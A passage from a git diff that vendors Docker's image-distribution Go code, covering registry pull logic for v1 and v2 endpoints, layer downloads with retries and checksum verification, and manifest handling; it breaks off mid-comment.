endpoint.URL) + continue + } + } + + logrus.Debugf("Trying to pull %s from %s %s", repoInfo.Name(), endpoint.URL, endpoint.Version) + + puller, err := newPuller(endpoint, repoInfo, imagePullConfig) + if err != nil { + lastErr = err + continue + } + if err := puller.Pull(ctx, ref); err != nil { + // Was this pull cancelled? If so, don't try to fall + // back. 
+ fallback := false + select { + case <-ctx.Done(): + default: + if fallbackErr, ok := err.(fallbackError); ok { + fallback = true + confirmedV2 = confirmedV2 || fallbackErr.confirmedV2 + if fallbackErr.transportOK && endpoint.URL.Scheme == "https" { + confirmedTLSRegistries[endpoint.URL.Host] = struct{}{} + } + err = fallbackErr.err + } + } + if fallback { + if _, ok := err.(ErrNoSupport); !ok { + // Because we found an error that's not ErrNoSupport, discard all subsequent ErrNoSupport errors. + discardNoSupportErrors = true + // append subsequent errors + lastErr = err + } else if !discardNoSupportErrors { + // Save the ErrNoSupport error, because it's either the first error or all encountered errors + // were also ErrNoSupport errors. + // append subsequent errors + lastErr = err + } + logrus.Errorf("Attempting next endpoint for pull after error: %v", err) + continue + } + logrus.Errorf("Not continuing with pull after error: %v", err) + return TranslatePullError(err, ref) + } + + imagePullConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "pull") + return nil + } + + if lastErr == nil { + lastErr = fmt.Errorf("no endpoints found for %s", ref.String()) + } + + return TranslatePullError(lastErr, ref) +} + +// writeStatus writes a status message to out. If layersDownloaded is true, the +// status message indicates that a newer image was downloaded. Otherwise, it +// indicates that the image is up to date. requestedTag is the tag the message +// will refer to. +func writeStatus(requestedTag string, out progress.Output, layersDownloaded bool) { + if layersDownloaded { + progress.Message(out, "", "Status: Downloaded newer image for "+requestedTag) + } else { + progress.Message(out, "", "Status: Image is up to date for "+requestedTag) + } +} + +// ValidateRepoName validates the name of a repository. 
+func ValidateRepoName(name string) error { + if name == "" { + return fmt.Errorf("Repository name can't be empty") + } + if name == api.NoBaseImageSpecifier { + return fmt.Errorf("'%s' is a reserved name", api.NoBaseImageSpecifier) + } + return nil +} + +func addDigestReference(store reference.Store, ref reference.Named, dgst digest.Digest, id digest.Digest) error { + dgstRef, err := reference.WithDigest(reference.TrimNamed(ref), dgst) + if err != nil { + return err + } + + if oldTagID, err := store.Get(dgstRef); err == nil { + if oldTagID != id { + // Updating digests not supported by reference store + logrus.Errorf("Image ID for digest %s changed from %s to %s, cannot update", dgst.String(), oldTagID, id) + } + return nil + } else if err != reference.ErrDoesNotExist { + return err + } + + return store.AddDigest(dgstRef, id, true) +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v1.go b/vendor/github.com/docker/docker/distribution/pull_v1.go new file mode 100644 index 0000000000..f44ed4f371 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v1.go @@ -0,0 +1,368 @@ +package distribution + +import ( + "errors" + "fmt" + "io" + "io/ioutil" + "net" + "net/url" + "os" + "strings" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +type v1Puller struct { + v1IDService *metadata.V1IDService + endpoint registry.APIEndpoint + config *ImagePullConfig + repoInfo *registry.RepositoryInfo + session 
*registry.Session +} + +func (p *v1Puller) Pull(ctx context.Context, ref reference.Named) error { + if _, isCanonical := ref.(reference.Canonical); isCanonical { + // Allowing fallback, because HTTPS v1 is before HTTP v2 + return fallbackError{err: ErrNoSupport{Err: errors.New("Cannot pull by digest with v1 registry")}} + } + + tlsConfig, err := p.config.RegistryService.TLSConfig(p.repoInfo.Index.Name) + if err != nil { + return err + } + // Adds Docker-specific headers as well as user-specified headers (metaHeaders) + tr := transport.NewTransport( + // TODO(tiborvass): was ReceiveTimeout + registry.NewTransport(tlsConfig), + registry.DockerHeaders(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders)..., + ) + client := registry.HTTPClient(tr) + v1Endpoint, err := p.endpoint.ToV1Endpoint(dockerversion.DockerUserAgent(ctx), p.config.MetaHeaders) + if err != nil { + logrus.Debugf("Could not get v1 endpoint: %v", err) + return fallbackError{err: err} + } + p.session, err = registry.NewSession(client, p.config.AuthConfig, v1Endpoint) + if err != nil { + // TODO(dmcgowan): Check if should fallback + logrus.Debugf("Fallback from error: %s", err) + return fallbackError{err: err} + } + if err := p.pullRepository(ctx, ref); err != nil { + // TODO(dmcgowan): Check if should fallback + return err + } + progress.Message(p.config.ProgressOutput, "", p.repoInfo.FullName()+": this image was pulled from a legacy registry. 
Important: This registry version will not be supported in future versions of docker.") + + return nil +} + +func (p *v1Puller) pullRepository(ctx context.Context, ref reference.Named) error { + progress.Message(p.config.ProgressOutput, "", "Pulling repository "+p.repoInfo.FullName()) + + tagged, isTagged := ref.(reference.NamedTagged) + + repoData, err := p.session.GetRepositoryData(p.repoInfo) + if err != nil { + if strings.Contains(err.Error(), "HTTP code: 404") { + if isTagged { + return fmt.Errorf("Error: image %s:%s not found", p.repoInfo.RemoteName(), tagged.Tag()) + } + return fmt.Errorf("Error: image %s not found", p.repoInfo.RemoteName()) + } + // Unexpected HTTP error + return err + } + + logrus.Debug("Retrieving the tag list") + var tagsList map[string]string + if !isTagged { + tagsList, err = p.session.GetRemoteTags(repoData.Endpoints, p.repoInfo) + } else { + var tagID string + tagsList = make(map[string]string) + tagID, err = p.session.GetRemoteTag(repoData.Endpoints, p.repoInfo, tagged.Tag()) + if err == registry.ErrRepoNotFound { + return fmt.Errorf("Tag %s not found in repository %s", tagged.Tag(), p.repoInfo.FullName()) + } + tagsList[tagged.Tag()] = tagID + } + if err != nil { + logrus.Errorf("unable to get remote tags: %s", err) + return err + } + + for tag, id := range tagsList { + repoData.ImgList[id] = ®istry.ImgData{ + ID: id, + Tag: tag, + Checksum: "", + } + } + + layersDownloaded := false + for _, imgData := range repoData.ImgList { + if isTagged && imgData.Tag != tagged.Tag() { + continue + } + + err := p.downloadImage(ctx, repoData, imgData, &layersDownloaded) + if err != nil { + return err + } + } + + writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded) + return nil +} + +func (p *v1Puller) downloadImage(ctx context.Context, repoData *registry.RepositoryData, img *registry.ImgData, layersDownloaded *bool) error { + if img.Tag == "" { + logrus.Debugf("Image (id: %s) present in this repository but untagged, skipping", 
img.ID) + return nil + } + + localNameRef, err := reference.WithTag(p.repoInfo, img.Tag) + if err != nil { + retErr := fmt.Errorf("Image (id: %s) has invalid tag: %s", img.ID, img.Tag) + logrus.Debug(retErr.Error()) + return retErr + } + + if err := v1.ValidateID(img.ID); err != nil { + return err + } + + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s", img.Tag, p.repoInfo.FullName()) + success := false + var lastErr error + for _, ep := range p.repoInfo.Index.Mirrors { + ep += "v1/" + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), fmt.Sprintf("Pulling image (%s) from %s, mirror: %s", img.Tag, p.repoInfo.FullName(), ep)) + if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil { + // Don't report errors when pulling from mirrors. + logrus.Debugf("Error pulling image (%s) from %s, mirror: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err) + continue + } + success = true + break + } + if !success { + for _, ep := range repoData.Endpoints { + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Pulling image (%s) from %s, endpoint: %s", img.Tag, p.repoInfo.FullName(), ep) + if err = p.pullImage(ctx, img.ID, ep, localNameRef, layersDownloaded); err != nil { + // It's not ideal that only the last error is returned, it would be better to concatenate the errors. + // As the error is also given to the output stream the user will see the error. 
+ lastErr = err + progress.Updatef(p.config.ProgressOutput, stringid.TruncateID(img.ID), "Error pulling image (%s) from %s, endpoint: %s, %s", img.Tag, p.repoInfo.FullName(), ep, err) + continue + } + success = true + break + } + } + if !success { + err := fmt.Errorf("Error pulling image (%s) from %s, %v", img.Tag, p.repoInfo.FullName(), lastErr) + progress.Update(p.config.ProgressOutput, stringid.TruncateID(img.ID), err.Error()) + return err + } + return nil +} + +func (p *v1Puller) pullImage(ctx context.Context, v1ID, endpoint string, localNameRef reference.Named, layersDownloaded *bool) (err error) { + var history []string + history, err = p.session.GetRemoteHistory(v1ID, endpoint) + if err != nil { + return err + } + if len(history) < 1 { + return fmt.Errorf("empty history for image %s", v1ID) + } + progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1ID), "Pulling dependent layers") + + var ( + descriptors []xfer.DownloadDescriptor + newHistory []image.History + imgJSON []byte + imgSize int64 + ) + + // Iterate over layers, in order from bottom-most to top-most. Download + // config for all layers and create descriptors. 
+ for i := len(history) - 1; i >= 0; i-- { + v1LayerID := history[i] + imgJSON, imgSize, err = p.downloadLayerConfig(v1LayerID, endpoint) + if err != nil { + return err + } + + // Create a new-style config from the legacy configs + h, err := v1.HistoryFromConfig(imgJSON, false) + if err != nil { + return err + } + newHistory = append(newHistory, h) + + layerDescriptor := &v1LayerDescriptor{ + v1LayerID: v1LayerID, + indexName: p.repoInfo.Index.Name, + endpoint: endpoint, + v1IDService: p.v1IDService, + layersDownloaded: layersDownloaded, + layerSize: imgSize, + session: p.session, + } + + descriptors = append(descriptors, layerDescriptor) + } + + rootFS := image.NewRootFS() + resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput) + if err != nil { + return err + } + defer release() + + config, err := v1.MakeConfigFromV1Config(imgJSON, &resultRootFS, newHistory) + if err != nil { + return err + } + + imageID, err := p.config.ImageStore.Put(config) + if err != nil { + return err + } + + if p.config.ReferenceStore != nil { + if err := p.config.ReferenceStore.AddTag(localNameRef, imageID, true); err != nil { + return err + } + } + + return nil +} + +func (p *v1Puller) downloadLayerConfig(v1LayerID, endpoint string) (imgJSON []byte, imgSize int64, err error) { + progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1LayerID), "Pulling metadata") + + retries := 5 + for j := 1; j <= retries; j++ { + imgJSON, imgSize, err := p.session.GetRemoteImageJSON(v1LayerID, endpoint) + if err != nil && j == retries { + progress.Update(p.config.ProgressOutput, stringid.TruncateID(v1LayerID), "Error pulling layer metadata") + return nil, 0, err + } else if err != nil { + time.Sleep(time.Duration(j) * 500 * time.Millisecond) + continue + } + + return imgJSON, imgSize, nil + } + + // not reached + return nil, 0, nil +} + +type v1LayerDescriptor struct { + v1LayerID string + indexName string + endpoint string + 
v1IDService *metadata.V1IDService + layersDownloaded *bool + layerSize int64 + session *registry.Session + tmpFile *os.File +} + +func (ld *v1LayerDescriptor) Key() string { + return "v1:" + ld.v1LayerID +} + +func (ld *v1LayerDescriptor) ID() string { + return stringid.TruncateID(ld.v1LayerID) +} + +func (ld *v1LayerDescriptor) DiffID() (layer.DiffID, error) { + return ld.v1IDService.Get(ld.v1LayerID, ld.indexName) +} + +func (ld *v1LayerDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) { + progress.Update(progressOutput, ld.ID(), "Pulling fs layer") + layerReader, err := ld.session.GetRemoteImageLayer(ld.v1LayerID, ld.endpoint, ld.layerSize) + if err != nil { + progress.Update(progressOutput, ld.ID(), "Error pulling dependent layers") + if uerr, ok := err.(*url.Error); ok { + err = uerr.Err + } + if terr, ok := err.(net.Error); ok && terr.Timeout() { + return nil, 0, err + } + return nil, 0, xfer.DoNotRetry{Err: err} + } + *ld.layersDownloaded = true + + ld.tmpFile, err = ioutil.TempFile("", "GetImageBlob") + if err != nil { + layerReader.Close() + return nil, 0, err + } + + reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, layerReader), progressOutput, ld.layerSize, ld.ID(), "Downloading") + defer reader.Close() + + _, err = io.Copy(ld.tmpFile, reader) + if err != nil { + ld.Close() + return nil, 0, err + } + + progress.Update(progressOutput, ld.ID(), "Download complete") + + logrus.Debugf("Downloaded %s to tempfile %s", ld.ID(), ld.tmpFile.Name()) + + ld.tmpFile.Seek(0, 0) + + // hand off the temporary file to the download manager, so it will only + // be closed once + tmpFile := ld.tmpFile + ld.tmpFile = nil + + return ioutils.NewReadCloserWrapper(tmpFile, func() error { + tmpFile.Close() + err := os.RemoveAll(tmpFile.Name()) + if err != nil { + logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name()) + } + return err + }), ld.layerSize, nil +} + +func (ld *v1LayerDescriptor) 
Close() { + if ld.tmpFile != nil { + ld.tmpFile.Close() + if err := os.RemoveAll(ld.tmpFile.Name()); err != nil { + logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name()) + } + ld.tmpFile = nil + } +} + +func (ld *v1LayerDescriptor) Registered(diffID layer.DiffID) { + // Cache mapping from this layer's DiffID to the blobsum + ld.v1IDService.Set(ld.v1LayerID, ld.indexName, diffID) +} diff --git a/vendor/github.com/docker/docker/distribution/pull_v2.go b/vendor/github.com/docker/docker/distribution/pull_v2.go new file mode 100644 index 0000000000..88807edc7d --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/pull_v2.go @@ -0,0 +1,878 @@ +package distribution + +import ( + "encoding/json" + "errors" + "fmt" + "io" + "io/ioutil" + "net/url" + "os" + "runtime" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution" + "github.com/docker/distribution/digest" + "github.com/docker/distribution/manifest/manifestlist" + "github.com/docker/distribution/manifest/schema1" + "github.com/docker/distribution/manifest/schema2" + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/distribution/registry/client/auth" + "github.com/docker/distribution/registry/client/transport" + "github.com/docker/docker/distribution/metadata" + "github.com/docker/docker/distribution/xfer" + "github.com/docker/docker/image" + "github.com/docker/docker/image/v1" + "github.com/docker/docker/layer" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/progress" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/reference" + "github.com/docker/docker/registry" + "golang.org/x/net/context" +) + +var ( + errRootFSMismatch = errors.New("layers from manifest don't match image configuration") + errRootFSInvalid = errors.New("invalid rootfs in image configuration") +) + +// ImageConfigPullError is an error pulling the image config blob +// (only applies to schema2). 
+type ImageConfigPullError struct { + Err error +} + +// Error returns the error string for ImageConfigPullError. +func (e ImageConfigPullError) Error() string { + return "error pulling image configuration: " + e.Err.Error() +} + +type v2Puller struct { + V2MetadataService metadata.V2MetadataService + endpoint registry.APIEndpoint + config *ImagePullConfig + repoInfo *registry.RepositoryInfo + repo distribution.Repository + // confirmedV2 is set to true if we confirm we're talking to a v2 + // registry. This is used to limit fallbacks to the v1 protocol. + confirmedV2 bool +} + +func (p *v2Puller) Pull(ctx context.Context, ref reference.Named) (err error) { + // TODO(tiborvass): was ReceiveTimeout + p.repo, p.confirmedV2, err = NewV2Repository(ctx, p.repoInfo, p.endpoint, p.config.MetaHeaders, p.config.AuthConfig, "pull") + if err != nil { + logrus.Warnf("Error getting v2 registry: %v", err) + return err + } + + if err = p.pullV2Repository(ctx, ref); err != nil { + if _, ok := err.(fallbackError); ok { + return err + } + if continueOnError(err) { + logrus.Errorf("Error trying v2 registry: %v", err) + return fallbackError{ + err: err, + confirmedV2: p.confirmedV2, + transportOK: true, + } + } + } + return err +} + +func (p *v2Puller) pullV2Repository(ctx context.Context, ref reference.Named) (err error) { + var layersDownloaded bool + if !reference.IsNameOnly(ref) { + layersDownloaded, err = p.pullV2Tag(ctx, ref) + if err != nil { + return err + } + } else { + tags, err := p.repo.Tags(ctx).All(ctx) + if err != nil { + // If this repository doesn't exist on V2, we should + // permit a fallback to V1. + return allowV1Fallback(err) + } + + // The v2 registry knows about this repository, so we will not + // allow fallback to the v1 protocol even if we encounter an + // error later on. 
+ p.confirmedV2 = true + + for _, tag := range tags { + tagRef, err := reference.WithTag(ref, tag) + if err != nil { + return err + } + pulledNew, err := p.pullV2Tag(ctx, tagRef) + if err != nil { + // Since this is the pull-all-tags case, don't + // allow an error pulling a particular tag to + // make the whole pull fall back to v1. + if fallbackErr, ok := err.(fallbackError); ok { + return fallbackErr.err + } + return err + } + // pulledNew is true if either new layers were downloaded OR if existing images were newly tagged + // TODO(tiborvass): should we change the name of `layersDownload`? What about message in WriteStatus? + layersDownloaded = layersDownloaded || pulledNew + } + } + + writeStatus(ref.String(), p.config.ProgressOutput, layersDownloaded) + + return nil +} + +type v2LayerDescriptor struct { + digest digest.Digest + repoInfo *registry.RepositoryInfo + repo distribution.Repository + V2MetadataService metadata.V2MetadataService + tmpFile *os.File + verifier digest.Verifier + src distribution.Descriptor +} + +func (ld *v2LayerDescriptor) Key() string { + return "v2:" + ld.digest.String() +} + +func (ld *v2LayerDescriptor) ID() string { + return stringid.TruncateID(ld.digest.String()) +} + +func (ld *v2LayerDescriptor) DiffID() (layer.DiffID, error) { + return ld.V2MetadataService.GetDiffID(ld.digest) +} + +func (ld *v2LayerDescriptor) Download(ctx context.Context, progressOutput progress.Output) (io.ReadCloser, int64, error) { + logrus.Debugf("pulling blob %q", ld.digest) + + var ( + err error + offset int64 + ) + + if ld.tmpFile == nil { + ld.tmpFile, err = createDownloadFile() + if err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + } else { + offset, err = ld.tmpFile.Seek(0, os.SEEK_END) + if err != nil { + logrus.Debugf("error seeking to end of download file: %v", err) + offset = 0 + + ld.tmpFile.Close() + if err := os.Remove(ld.tmpFile.Name()); err != nil { + logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name()) + } + 
ld.tmpFile, err = createDownloadFile() + if err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + } else if offset != 0 { + logrus.Debugf("attempting to resume download of %q from %d bytes", ld.digest, offset) + } + } + + tmpFile := ld.tmpFile + + layerDownload, err := ld.open(ctx) + if err != nil { + logrus.Errorf("Error initiating layer download: %v", err) + return nil, 0, retryOnError(err) + } + + if offset != 0 { + _, err := layerDownload.Seek(offset, os.SEEK_SET) + if err != nil { + if err := ld.truncateDownloadFile(); err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + return nil, 0, err + } + } + size, err := layerDownload.Seek(0, os.SEEK_END) + if err != nil { + // Seek failed, perhaps because there was no Content-Length + // header. This shouldn't fail the download, because we can + // still continue without a progress bar. + size = 0 + } else { + if size != 0 && offset > size { + logrus.Debug("Partial download is larger than full blob. Starting over") + offset = 0 + if err := ld.truncateDownloadFile(); err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + } + + // Restore the seek offset either at the beginning of the + // stream, or just after the last byte we have from previous + // attempts. 
+ _, err = layerDownload.Seek(offset, os.SEEK_SET) + if err != nil { + return nil, 0, err + } + } + + reader := progress.NewProgressReader(ioutils.NewCancelReadCloser(ctx, layerDownload), progressOutput, size-offset, ld.ID(), "Downloading") + defer reader.Close() + + if ld.verifier == nil { + ld.verifier, err = digest.NewDigestVerifier(ld.digest) + if err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + } + + _, err = io.Copy(tmpFile, io.TeeReader(reader, ld.verifier)) + if err != nil { + if err == transport.ErrWrongCodeForByteRange { + if err := ld.truncateDownloadFile(); err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + return nil, 0, err + } + return nil, 0, retryOnError(err) + } + + progress.Update(progressOutput, ld.ID(), "Verifying Checksum") + + if !ld.verifier.Verified() { + err = fmt.Errorf("filesystem layer verification failed for digest %s", ld.digest) + logrus.Error(err) + + // Allow a retry if this digest verification error happened + // after a resumed download. 
+ if offset != 0 { + if err := ld.truncateDownloadFile(); err != nil { + return nil, 0, xfer.DoNotRetry{Err: err} + } + + return nil, 0, err + } + return nil, 0, xfer.DoNotRetry{Err: err} + } + + progress.Update(progressOutput, ld.ID(), "Download complete") + + logrus.Debugf("Downloaded %s to tempfile %s", ld.ID(), tmpFile.Name()) + + _, err = tmpFile.Seek(0, os.SEEK_SET) + if err != nil { + tmpFile.Close() + if err := os.Remove(tmpFile.Name()); err != nil { + logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name()) + } + ld.tmpFile = nil + ld.verifier = nil + return nil, 0, xfer.DoNotRetry{Err: err} + } + + // hand off the temporary file to the download manager, so it will only + // be closed once + ld.tmpFile = nil + + return ioutils.NewReadCloserWrapper(tmpFile, func() error { + tmpFile.Close() + err := os.RemoveAll(tmpFile.Name()) + if err != nil { + logrus.Errorf("Failed to remove temp file: %s", tmpFile.Name()) + } + return err + }), size, nil +} + +func (ld *v2LayerDescriptor) Close() { + if ld.tmpFile != nil { + ld.tmpFile.Close() + if err := os.RemoveAll(ld.tmpFile.Name()); err != nil { + logrus.Errorf("Failed to remove temp file: %s", ld.tmpFile.Name()) + } + } +} + +func (ld *v2LayerDescriptor) truncateDownloadFile() error { + // Need a new hash context since we will be redoing the download + ld.verifier = nil + + if _, err := ld.tmpFile.Seek(0, os.SEEK_SET); err != nil { + logrus.Errorf("error seeking to beginning of download file: %v", err) + return err + } + + if err := ld.tmpFile.Truncate(0); err != nil { + logrus.Errorf("error truncating download file: %v", err) + return err + } + + return nil +} + +func (ld *v2LayerDescriptor) Registered(diffID layer.DiffID) { + // Cache mapping from this layer's DiffID to the blobsum + ld.V2MetadataService.Add(diffID, metadata.V2Metadata{Digest: ld.digest, SourceRepository: ld.repoInfo.FullName()}) +} + +func (p *v2Puller) pullV2Tag(ctx context.Context, ref reference.Named) (tagUpdated bool, err error) { + 
manSvc, err := p.repo.Manifests(ctx) + if err != nil { + return false, err + } + + var ( + manifest distribution.Manifest + tagOrDigest string // Used for logging/progress only + ) + if tagged, isTagged := ref.(reference.NamedTagged); isTagged { + manifest, err = manSvc.Get(ctx, "", distribution.WithTag(tagged.Tag())) + if err != nil { + return false, allowV1Fallback(err) + } + tagOrDigest = tagged.Tag() + } else if digested, isDigested := ref.(reference.Canonical); isDigested { + manifest, err = manSvc.Get(ctx, digested.Digest()) + if err != nil { + return false, err + } + tagOrDigest = digested.Digest().String() + } else { + return false, fmt.Errorf("internal error: reference has neither a tag nor a digest: %s", ref.String()) + } + + if manifest == nil { + return false, fmt.Errorf("image manifest does not exist for tag or digest %q", tagOrDigest) + } + + if m, ok := manifest.(*schema2.DeserializedManifest); ok { + var allowedMediatype bool + for _, t := range p.config.Schema2Types { + if m.Manifest.Config.MediaType == t { + allowedMediatype = true + break + } + } + if !allowedMediatype { + configClass := mediaTypeClasses[m.Manifest.Config.MediaType] + if configClass == "" { + configClass = "unknown" + } + return false, fmt.Errorf("target is %s", configClass) + } + } + + // If manSvc.Get succeeded, we can be confident that the registry on + // the other side speaks the v2 protocol. 
+ p.confirmedV2 = true + + logrus.Debugf("Pulling ref from V2 registry: %s", ref.String()) + progress.Message(p.config.ProgressOutput, tagOrDigest, "Pulling from "+p.repo.Named().Name()) + + var ( + id digest.Digest + manifestDigest digest.Digest + ) + + switch v := manifest.(type) { + case *schema1.SignedManifest: + if p.config.RequireSchema2 { + return false, fmt.Errorf("invalid manifest: not schema2") + } + id, manifestDigest, err = p.pullSchema1(ctx, ref, v) + if err != nil { + return false, err + } + case *schema2.DeserializedManifest: + id, manifestDigest, err = p.pullSchema2(ctx, ref, v) + if err != nil { + return false, err + } + case *manifestlist.DeserializedManifestList: + id, manifestDigest, err = p.pullManifestList(ctx, ref, v) + if err != nil { + return false, err + } + default: + return false, errors.New("unsupported manifest format") + } + + progress.Message(p.config.ProgressOutput, "", "Digest: "+manifestDigest.String()) + + if p.config.ReferenceStore != nil { + oldTagID, err := p.config.ReferenceStore.Get(ref) + if err == nil { + if oldTagID == id { + return false, addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id) + } + } else if err != reference.ErrDoesNotExist { + return false, err + } + + if canonical, ok := ref.(reference.Canonical); ok { + if err = p.config.ReferenceStore.AddDigest(canonical, id, true); err != nil { + return false, err + } + } else { + if err = addDigestReference(p.config.ReferenceStore, ref, manifestDigest, id); err != nil { + return false, err + } + if err = p.config.ReferenceStore.AddTag(ref, id, true); err != nil { + return false, err + } + } + } + return true, nil +} + +func (p *v2Puller) pullSchema1(ctx context.Context, ref reference.Named, unverifiedManifest *schema1.SignedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) { + var verifiedManifest *schema1.Manifest + verifiedManifest, err = verifySchema1Manifest(unverifiedManifest, ref) + if err != nil { + return "", "", err + } + 
+ rootFS := image.NewRootFS() + + // remove duplicate layers and check parent chain validity + err = fixManifestLayers(verifiedManifest) + if err != nil { + return "", "", err + } + + var descriptors []xfer.DownloadDescriptor + + // Image history converted to the new format + var history []image.History + + // Note that the order of this loop is in the direction of bottom-most + // to top-most, so that the downloads slice gets ordered correctly. + for i := len(verifiedManifest.FSLayers) - 1; i >= 0; i-- { + blobSum := verifiedManifest.FSLayers[i].BlobSum + + var throwAway struct { + ThrowAway bool `json:"throwaway,omitempty"` + } + if err := json.Unmarshal([]byte(verifiedManifest.History[i].V1Compatibility), &throwAway); err != nil { + return "", "", err + } + + h, err := v1.HistoryFromConfig([]byte(verifiedManifest.History[i].V1Compatibility), throwAway.ThrowAway) + if err != nil { + return "", "", err + } + history = append(history, h) + + if throwAway.ThrowAway { + continue + } + + layerDescriptor := &v2LayerDescriptor{ + digest: blobSum, + repoInfo: p.repoInfo, + repo: p.repo, + V2MetadataService: p.V2MetadataService, + } + + descriptors = append(descriptors, layerDescriptor) + } + + resultRootFS, release, err := p.config.DownloadManager.Download(ctx, *rootFS, descriptors, p.config.ProgressOutput) + if err != nil { + return "", "", err + } + defer release() + + config, err := v1.MakeConfigFromV1Config([]byte(verifiedManifest.History[0].V1Compatibility), &resultRootFS, history) + if err != nil { + return "", "", err + } + + imageID, err := p.config.ImageStore.Put(config) + if err != nil { + return "", "", err + } + + manifestDigest = digest.FromBytes(unverifiedManifest.Canonical) + + return imageID, manifestDigest, nil +} + +func (p *v2Puller) pullSchema2(ctx context.Context, ref reference.Named, mfst *schema2.DeserializedManifest) (id digest.Digest, manifestDigest digest.Digest, err error) { + manifestDigest, err = schema2ManifestDigest(ref, mfst) + if err != 
nil { + return "", "", err + } + + target := mfst.Target() + if _, err := p.config.ImageStore.Get(target.Digest); err == nil { + // If the image already exists locally, no need to pull + // anything. + return target.Digest, manifestDigest, nil + } + + var descriptors []xfer.DownloadDescriptor + + // Note that the order of this loop is in the direction of bottom-most + // to top-most, so that the downloads slice gets ordered correctly. + for _, d := range mfst.Layers { + layerDescriptor := &v2LayerDescriptor{ + digest: d.Digest, + repo: p.repo, + repoInfo: p.repoInfo, + V2MetadataService: p.V2MetadataService, + src: d, + } + + descriptors = append(descriptors, layerDescriptor) + } + + configChan := make(chan []byte, 1) + errChan := make(chan error, 1) + var cancel func() + ctx, cancel = context.WithCancel(ctx) + + // Pull the image config + go func() { + configJSON, err := p.pullSchema2Config(ctx, target.Digest) + if err != nil { + errChan <- ImageConfigPullError{Err: err} + cancel() + return + } + configChan <- configJSON + }() + + var ( + configJSON []byte // raw serialized image config + downloadedRootFS *image.RootFS // rootFS from registered layers + configRootFS *image.RootFS // rootFS from configuration + ) + + // https://github.com/docker/docker/issues/24766 - Err on the side of caution, + // explicitly blocking images intended for linux from the Windows daemon. On + // Windows, we do this before the attempt to download, effectively serialising + // the download slightly slowing it down. We have to do it this way, as + // chances are the download of layers itself would fail due to file names + // which aren't suitable for NTFS. At some point in the future, if a similar + // check to block Windows images being pulled on Linux is implemented, it + // may be necessary to perform the same type of serialisation. 
+ if runtime.GOOS == "windows" { + configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan) + if err != nil { + return "", "", err + } + + if configRootFS == nil { + return "", "", errRootFSInvalid + } + } + + if p.config.DownloadManager != nil { + downloadRootFS := *image.NewRootFS() + rootFS, release, err := p.config.DownloadManager.Download(ctx, downloadRootFS, descriptors, p.config.ProgressOutput) + if err != nil { + if configJSON != nil { + // Already received the config + return "", "", err + } + select { + case err = <-errChan: + return "", "", err + default: + cancel() + select { + case <-configChan: + case <-errChan: + } + return "", "", err + } + } + if release != nil { + defer release() + } + + downloadedRootFS = &rootFS + } + + if configJSON == nil { + configJSON, configRootFS, err = receiveConfig(p.config.ImageStore, configChan, errChan) + if err != nil { + return "", "", err + } + + if configRootFS == nil { + return "", "", errRootFSInvalid + } + } + + if downloadedRootFS != nil { + // The DiffIDs returned in rootFS MUST match those in the config. + // Otherwise the image config could be referencing layers that aren't + // included in the manifest. 
+ if len(downloadedRootFS.DiffIDs) != len(configRootFS.DiffIDs) { + return "", "", errRootFSMismatch + } + + for i := range downloadedRootFS.DiffIDs { + if downloadedRootFS.DiffIDs[i] != configRootFS.DiffIDs[i] { + return "", "", errRootFSMismatch + } + } + } + + imageID, err := p.config.ImageStore.Put(configJSON) + if err != nil { + return "", "", err + } + + return imageID, manifestDigest, nil +} + +func receiveConfig(s ImageConfigStore, configChan <-chan []byte, errChan <-chan error) ([]byte, *image.RootFS, error) { + select { + case configJSON := <-configChan: + rootfs, err := s.RootFSFromConfig(configJSON) + if err != nil { + return nil, nil, err + } + return configJSON, rootfs, nil + case err := <-errChan: + return nil, nil, err + // Don't need a case for ctx.Done in the select because cancellation + // will trigger an error in p.pullSchema2ImageConfig. + } +} + +// pullManifestList handles "manifest lists" which point to various +// platform-specifc manifests. +func (p *v2Puller) pullManifestList(ctx context.Context, ref reference.Named, mfstList *manifestlist.DeserializedManifestList) (id digest.Digest, manifestListDigest digest.Digest, err error) { + manifestListDigest, err = schema2ManifestDigest(ref, mfstList) + if err != nil { + return "", "", err + } + + var manifestDigest digest.Digest + for _, manifestDescriptor := range mfstList.Manifests { + // TODO(aaronl): The manifest list spec 